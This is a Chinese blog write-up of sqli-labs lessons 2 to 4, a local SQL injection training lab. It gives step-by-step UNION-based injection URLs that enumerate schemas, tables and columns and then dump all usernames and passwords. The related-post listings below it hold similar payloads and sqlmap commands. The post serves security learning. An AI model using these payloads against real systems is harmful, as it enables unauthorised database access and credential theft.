sqli-labs>>Less-2,3,4

最新推荐文章于 2021-01-29 18:06:30 发布
最新推荐文章于 2021-01-29 18:06:30 发布
阅读量203 收藏 1
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645530/article/details/104937660
版权

文章目录

1.Less 2

  1. 当我们http://localhost/sqli-labs-master/Less-2/?id=1 发现正常
    在这里插入图片描述

  2. 当我们http://localhost/sqli-labs-master/Less-2/?id=1',报错,存在漏洞
    在这里插入图片描述

  3. 当我们http://localhost/sqli-labs-master/Less-2/?id=1'',还是报错,说明是整型注入
    在这里插入图片描述
    然后我们再重复Less 1 的操作(截图不放了,没用

  4. http://localhost/sqli-labs-master/Less-2/?id=1 order by 3

  5. http://localhost/sqli-labs-master/Less-2/?id=1 order by 4可以知道数据库有三列

  6. http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 --+知道2,3列被回显,

  7. http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+ 输出所有数据库名
    在这里插入图片描述

  8. http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+查询security库
    在这里插入图片描述

  9. http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+查询users表
    在这里插入图片描述

  10. http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users --+查看所有用户名和密码
    在这里插入图片描述

2.Less 3

  1. http://localhost/sqli-labs-master/Less-3/?id=1,发现正常
    在这里插入图片描述

  2. http://localhost/sqli-labs-master/Less-3/?id=1'报错,存在漏洞
    在这里插入图片描述

  3. 根据报错的我们知道括号未闭合,构造url,http://localhost/sqli-labs-master/Less-3/?id=1')--+
    在这里插入图片描述

  4. http://localhost/sqli-labs-master/Less-3/?id=1') order by 3 --+

  5. http://localhost/sqli-labs-master/Less-3/?id=1') order by 4 --+查询数据库有三列

  6. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+发现2,3回显

  7. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+得到全部库名

  8. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+查询security库

  9. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+查询users

  10. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username) ,group_concat(password) from users --+得到用户名密码
    在这里插入图片描述

3.Less 4

还是老样子,参数加引号判断注入类型,我们发现加一个单引号和两个单引号均正常回显。
在这里插入图片描述

当我们加一个双引号发现报错,所以这个题和第三题一样,只不过单引号变成了双引号而已。
在这里插入图片描述

直接仿照1,2,3的步骤构造url:http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+得到用户名和密码
在这里插入图片描述

YOUNGBC
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL注入详解(第二章手工注入)
m0_52051132的博客
09-17 2617
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
SQL注入之sqli-labs-master Less-2
luoshiyong123的博客
03-28 310
该关存储id形式为整形即id=1 所以直接order by得到列数 然后union爆破
Sqli-Labs学习记录(手工注入)(Less1-Less8)
Hello world and you!
01-29 307
冥泽的sqli-labs笔记(手工注入)Less 1Less 2Less 3Less 4Less 5Less 6Less 7Less 8 Less 1 尝试 ?id=1’ 看报错内容 判断输入参数的内容被存放到一对单引号中间 利用order看字段数 到 http://localhost/sqlilabs/Less-1/?id=-1’ order by 4 --+ 报错 证明字段数为3 判断回显位 http://localhost/sqlilabs/Less-1/?id=-1’ union sele
sqli-labs小游戏关(1-20)关详解
weixin_51356351的博客
10-22 897
第一关 第一关是联合查询注入 判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 http://localhost/sqli-labs-master/Less-1/?id=1’ – - http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- - http://localhost/sqli-labs-master/Less-1/?id=1’
SQLi-labs(Less-1、Less-2、Less-3、Less-4)
weixin_41182861的博客
08-01 209
Less-1 GET - Error based - Single quotes - String 根据页面提示: Please input the ID as parameter with numeric value 请输入ID作为带有数字值的参数 输入?id=1返回正常,即:http://192.168.31.241:83/Less-1/?id=1 输入?id=1’返回错误,即:http://192.168.31.241:83/Less-1/?id=1’ 但通过页面提示发现输入的单引号成功被数
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
SQL注入之手工注入sqli-labs-master
龙乐的专栏
08-22 3898
sql注入就是用户在Web页面中输入的指令内容可以在数据库中执行。这里我通过sqli-labs-master来演示下手工sql注入。 首先是搭建环境,我用的是WampServer
sqli-labs从零开始学习日记(一)
sky_die的专栏
05-07 5558
学习SQL注入一直没什么头绪,用工具我真不是很喜欢,看到WOOYUN那些大牛扫腾讯,新浪的大战漏洞一般很多都是手动分析,我决定用SQLI-LABS学习,感觉不错,有兴趣的可以去他们的网站http://dummy2dummies.blogspot.com/2012/06/sqli-lab-series-part2.html去学习,要翻墙。 安装什么的自己用xampp搭建就行了。具体请看http:/
sqli-labs】 less4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)...
ajxi63204的博客
01-18 150
提交id参数 加' http://localhost/sqli/Less-4/?id=1' 页面正常,添加" http://localhost/sqli/Less-4/?id=1" 对应的sql语句应为 select ... from ... where xx=("1") limit 0,1 构造 select ... from ....
【合天网安】SQLi-Labs系列之数字型报错注入
hehigoxqc606的博客
09-01 209
1、点击GET-Error based – Intiger based,进入实验界面 加入参数id,同时加入一个单引号,查看报错情况。 可以看到发生错误的原因是多了一个单引号,当我们去掉单引号时正常显示,说明有可能是数字型注入,或者是字符型注入。接下来可以按照第一部分中的步骤进行爆值,这里避免重复用另一种方式。 2、使用extractvalue函数进行报错注入, http://localhost/sqli-labs-master/Less-2/?id=-1 and extractvalu.
sqli-labs通关Less 1-4
weixin_42238068的博客
10-12 162
sqli-labs通关Less 1-4 实验工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正确的情况下,创建实验数据库出错,可能是由于php版本造成,可试着更改其版本。 一. Less 1 判断注入类型 判断语句:http://localhost/sql-lab/less-1/??id=1 , id=1’ id=1 --+(%23) 字符是用来注释sql后面的语句。 根据页面回显可以确
使用sqlmap对sqli-less-2 的题解
weixin_44352058的博客
05-02 303
1.检测注入点 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 2.查看数据库 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 –dbs 3.查看数据库中的表 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security –tab...
sqli-labs-less-2完整教程
yzcn
10-22 1508
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
sqli-labs学习笔记 DAY2
极客剑寮
02-18 257
DAY2 sqli-labs lesson 2 手工注入 URL:http://localhost/sqli-labs-master/Less-2/ Parameter:id 注入点检测:id=2;–+ 回显点检测:id=2+UNION+SELECT+1,2,3;–+ 字段数猜解:id=2+ORDER+BY+3;–+ 获取当前数据库:id=99+UNION+SELECT+1,database(...
Sqli-labs之Less1-10
Mi1k7ea
04-14 4500
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
sqli-labs-less
最新发布
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值